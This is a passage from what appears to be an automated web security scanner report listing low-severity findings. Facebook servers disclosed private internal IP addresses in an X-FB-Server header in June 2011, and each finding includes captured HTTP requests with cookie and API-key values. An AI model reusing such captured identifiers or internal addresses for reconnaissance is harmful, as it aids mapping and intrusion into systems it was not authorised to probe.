window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.320. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.218.122

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.27.218.122
X-Cnection: close
Date: Thu, 16 Jun 2011 11:24:12 GMT

/*1308223452,169597562*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.321. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.53.51

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.53.51
X-Cnection: close
Date: Thu, 16 Jun 2011 18:11:52 GMT

/*1308247912,171324723*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.322. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.193.131

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df18d5e5274%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1de4dacf4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.32.193.131
X-Cnection: close
Date: Thu, 16 Jun 2011 15:41:51 GMT

/*1308238911,169918851*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.323. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.19.48

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.55.19.48
X-Cnection: close
Date: Thu, 16 Jun 2011 16:38:42 GMT

/*1308242322,171381552*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.324. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.62.113

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.27.62.113
X-Cnection: close
Date: Thu, 16 Jun 2011 11:25:07 GMT

/*1308223507,169557617*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.325. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.233.108

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1636510b8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f8752af%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.136.233.108
X-Cnection: close
Date: Thu, 16 Jun 2011 13:43:02 GMT

/*1308231782,176744812*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.326. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.121.53

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df31f2e355%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2517c53d%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.42.121.53
X-Cnection: close
Date: Thu, 16 Jun 2011 12:20:21 GMT

/*1308226821,170555701*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.327. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.135.111

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3aa7a87a%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffb507f9ac%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.27.135.111
X-Cnection: close
Date: Thu, 16 Jun 2011 13:58:33 GMT

/*1308232713,169576303*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.328. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.56.127

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3a803aa8%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1e06a7d9c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fonline.wsj.com%2Farticle%2FSB10001424052702303714704576384051388321740.html%3Fmod%3DWSJ_hp_mostpop_read&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=300
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.27.56.127
X-Cnection: close
Date: Thu, 16 Jun 2011 11:22:40 GMT

/*1308223360,169556095*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.329. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.122.61

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.122.61
X-Cnection: close
Date: Thu, 16 Jun 2011 15:05:41 GMT

/*1308236741,171342397*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.330. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.128.53

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df14add876c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff118208ba%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.128.53
X-Cnection: close
Date: Thu, 16 Jun 2011 14:34:42 GMT

/*1308234882,171343925*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.331. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.41.24

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.41.24
X-Cnection: close
Date: Thu, 16 Jun 2011 14:03:40 GMT

/*1308233020,171321624*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.332. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.47.114

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3727f23f4%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1317e5bb4%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fonline.wsj.com%2Fvideo%2Fhow-to-include-your-pet-in-your-wedding-party%2F8DE80DF5-6EA8-4B36-B310-BCA4427CCA14.html&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.27.47.114
X-Cnection: close
Date: Thu, 16 Jun 2011 11:24:16 GMT

/*1308223456,169553778*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.333. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.57.37

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.57.37
X-Cnection: close
Date: Thu, 16 Jun 2011 17:04:34 GMT

/*1308243874,171325733*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.334. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.234.67

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.42.234.67
X-Cnection: close
Date: Thu, 16 Jun 2011 15:26:21 GMT

/*1308237981,170584643*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.335. http://connect.facebook.net/en_US/all.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://connect.facebook.net
Path:	/en_US/all.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.242.121

Request

GET /en_US/all.js HTTP/1.1
Host: connect.facebook.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-None-Match: "2c9086b6572ca464ff3c3a07121f199b"

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "69e26ca51095b92d4ba58ace7cf972b5"
X-FB-Server: 10.32.242.121
X-Cnection: close
Content-Length: 126453
Cache-Control: public, max-age=1153
Expires: Thu, 16 Jun 2011 11:41:32 GMT
Date: Thu, 16 Jun 2011 11:22:19 GMT
Connection: close
Vary: Accept-Encoding

/*1308142292,169931385,JIT Construction: v392550,en_US*/

if(!window.FB)window.FB={_apiKey:null,_session:null,_userStatus:'unknown',_logging:true,_inCanvas:((window.location.search.indexOf('fb_sig_in_
...[SNIP]...

19.336. http://external.ak.fbcdn.net/safe_image.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.208.63

Request

GET /safe_image.php?d=026a927b8f8b822b1c44a49e7beacb7e&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__METALS_MINING%2Fgoldbars_close_200.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.54.208.63
X-Cnection: close
Content-Length: 12846
Vary: Accept-Encoding
Cache-Control: public, max-age=14400
Expires: Thu, 16 Jun 2011 15:25:06 GMT
Date: Thu, 16 Jun 2011 11:25:06 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222
...[SNIP]...

19.337. http://external.ak.fbcdn.net/safe_image.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.71.40

Request

GET /safe_image.php?d=b105aba841da3336db139104d1f431ea&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__PEOPLE%2FO%2F_OBAMA_BARACK%2Fobama_barack_041211_200.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.54.71.40
X-Cnection: close
Content-Length: 7062
Vary: Accept-Encoding
Cache-Control: public, max-age=14400
Expires: Thu, 16 Jun 2011 15:25:06 GMT
Date: Thu, 16 Jun 2011 11:25:06 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222
...[SNIP]...

19.338. http://external.ak.fbcdn.net/safe_image.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.188.32

Request

GET /safe_image.php?d=8050391a7fdf877236dced9c97f78f34&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__PEOPLE%2FO%2F_OBAMA_BARACK%2Fobama_barack_97_200.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.54.188.32
X-Cnection: close
Content-Length: 6656
Vary: Accept-Encoding
Cache-Control: public, max-age=14400
Expires: Thu, 16 Jun 2011 15:26:25 GMT
Date: Thu, 16 Jun 2011 11:26:25 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222
...[SNIP]...

19.339. http://external.ak.fbcdn.net/safe_image.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.36.234.123

Request

GET /safe_image.php?d=1c5765a8b25451be6e6f5e2cdf240628&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__BOOKS%2FG%2Fgo_the_f_to_sleep_300.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.36.234.123
X-Cnection: close
Content-Length: 20089
Vary: Accept-Encoding
Cache-Control: public, max-age=14400
Expires: Thu, 16 Jun 2011 15:25:06 GMT
Date: Thu, 16 Jun 2011 11:25:06 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222
...[SNIP]...

19.340. http://external.ak.fbcdn.net/safe_image.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.152.121

Request

GET /safe_image.php?d=b1ed8a9455f000768c480c95f08aa03d&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__PEOPLE%2FG%2Fgross_bill_DC_200.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.32.152.121
Content-Length: 5450
Vary: Accept-Encoding
Cache-Control: public, max-age=14400
Expires: Thu, 16 Jun 2011 18:19:09 GMT
Date: Thu, 16 Jun 2011 14:19:09 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222
...[SNIP]...

19.341. http://external.ak.fbcdn.net/safe_image.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.224.121

Request

GET /safe_image.php?d=b1c5d00e8642cae48bd7f89c89abc4d9&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__TECHNOLOGY%2F_INTERNET%2Ffacebook_200.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.27.224.121
X-Cnection: close
Content-Length: 6245
Vary: Accept-Encoding
Cache-Control: public, max-age=14400
Expires: Thu, 16 Jun 2011 15:25:06 GMT
Date: Thu, 16 Jun 2011 11:25:06 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222
...[SNIP]...

19.342. http://external.ak.fbcdn.net/safe_image.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
